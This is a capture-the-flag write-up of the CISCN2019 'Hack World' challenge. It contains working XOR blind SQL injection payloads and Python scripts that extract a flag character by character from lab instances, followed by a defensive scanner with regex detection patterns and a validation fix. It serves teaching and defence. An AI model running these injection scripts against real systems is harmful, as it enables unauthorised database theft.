[CISCN2019 North China Division Day2 Web1] Hack World: notes on XOR injection
0x00: Preface
I have rarely run into XOR injection before,
so today I am writing it down.
Reproduction environment: https://buuoj.cn/
0x01: XOR injection
0x02: Blind injection payload
id=(ascii(substr((select(flag)from(flag)),1,1000))>1)^1
import requests

url = "http://170a957a-daae-4912-8f7e-5452c854f8de.node3.buuoj.cn/index.php"


def DBlen():  # blind-inject the length of the database name
    for i in range(1, 40):
        # (length(database()) > i) ^ 1
        parm = "(length(database())>" + str(i) + ")^1"
        data = {'id': parm}
        req = requests.post(url, data=data)
        # the first i for which length(database()) > i is false is the length itself
        if "Hello, glzjin wants a girlfriend." in req.text:
            return i


def DBname(dblen):  # blind-inject the database name
    # (ascii(substr(database(),2,11))>100)^1
    dbname = ""
    for i in range(1, dblen + 1):  # MySQL substr positions start at 1
        for j in range(0, 300):
            parm = "(ascii(substr(database()," + str(i) + "," + str(dblen) + "))>" + str(j) + ")^1"
            data = {'id': parm}
            req = requests.post(url, data=data)
            if "Hello, glzjin wants a girlfriend." in req.text:
                dbname += chr(j)  # first j with ascii <= j, i.e. ascii == j
                break
    return dbname


def getflag():
    # payload = "(ascii(substr((select(flag)from(flag)),1,1000))>102)^1"
    flag = ""
    for j in range(1, 50):
        for i in range(1, 256):
            parm = "(ascii(substr((select(flag)from(flag)),%s,1000))>%s)^1" % (str(j), str(i))
            data = {'id': parm}
            req = requests.post(url, data=data)
            if "Hello, glzjin wants a girlfriend." in req.text:
                flag += chr(i)
                break
    return flag


def main():
    length = DBlen()  # length of the database name
    print("Database name length: " + str(length))
    dbname = DBname(length)
    print("Database name: " + dbname)


def main1():
    print(getflag())


if __name__ == '__main__':
    main1()
This challenge is solved with blind injection.
ascii: returns the ASCII code of the first character of the string.
substr: slicing (in MySQL the start position of substr begins at 1); the len argument of substr can be arbitrarily large, which does not matter because ascii only reads the first character.
The XOR is applied to the value of (ascii(substr((select(flag)from(flag)),1,1000))>1), which is either 1 or 0.
XORing that with 1 flips it: a true comparison gives id=0, a false one gives id=1, so the page's response tells you which it was, and from that the final flag can be recovered character by character.
import requests

url = "http://87ba091d-cbea-4196-98e7-97a83bec2d07.node3.buuoj.cn/index.php"

for q in range(1, 100):
    for i in range(0, 254):
        # 1 ^ (ascii of the q-th flag character == i): when equal, id becomes 0 and the page shows "Error Occured"
        payload = "1^(SELECT(ASCII(MID((SELECT(CONCAT(flag))FROM(flag))," + str(q) + ",1))=" + str(i) + "))"
        data = {"id": payload}
        req = requests.post(url, data=data)
        if "Error Occured" in req.text:
            print(chr(i), end='')
            break
The script at the top was for practice; this one follows the challenge's hint directly and gets the flag straight away.
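Added here as a defender-side example, not code from the writeup: a small Python scanner that URL-decodes the id parameter from constructed request-body log lines, flags the two signatures these payloads rely on (a boolean expression XORed with a literal, and ascii/ord wrapped around substr/mid), and shows the server-side validation that would have rejected every one of them. SAMPLE_LOG, the regexes and the function names are all assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies (not taken from the page), as an application
# or WAF log might record requests to index.php.
SAMPLE_LOG = [
    "id=1",
    "id=2",
    "id=(length(database())>7)^1",
    "id=(ascii(substr((select(flag)from(flag)),1,1000))>102)^1",
    "id=1^(SELECT(ASCII(MID((SELECT(CONCAT(flag))FROM(flag)),3,1))=108))",
    "id=%28ascii%28substr%28database%28%29%2C1%2C1%29%29%3E100%29%5E1",
]

# A parenthesised expression XORed with a digit: "...)^1" or "1^(...".
XOR_ORACLE = re.compile(r"\)\s*\^\s*\d|\d\s*\^\s*\(")
# Character-extraction oracle: ascii/ord wrapped directly around substr/substring/mid.
CHAR_ORACLE = re.compile(r"(?i)\b(?:ascii|ord)\s*\(\s*(?:substr|substring|mid)\s*\(")


def id_param(body):
    """URL-decode one request body and return its id parameter ('' if absent)."""
    return parse_qs(body, keep_blank_values=True).get("id", [""])[0]


def detect(value):
    """Return the list of indicators found in a decoded id value."""
    reasons = []
    if XOR_ORACLE.search(value):
        reasons.append("xor-oracle")
    if CHAR_ORACLE.search(value):
        reasons.append("char-oracle")
    return reasons


def scan(lines):
    """Return [(decoded id, reasons)] for every line that looks like XOR blind injection."""
    hits = []
    for line in lines:
        value = id_param(line)
        reasons = detect(value)
        if reasons:
            hits.append((value, reasons))
    return hits


def is_valid_id(value):
    """Server-side fix: only a plain integer may reach the query, so no expression survives."""
    return value.isdigit()


if __name__ == "__main__":
    for value, reasons in scan(SAMPLE_LOG):
        print(f"{value!r:72} {','.join(reasons)}")
```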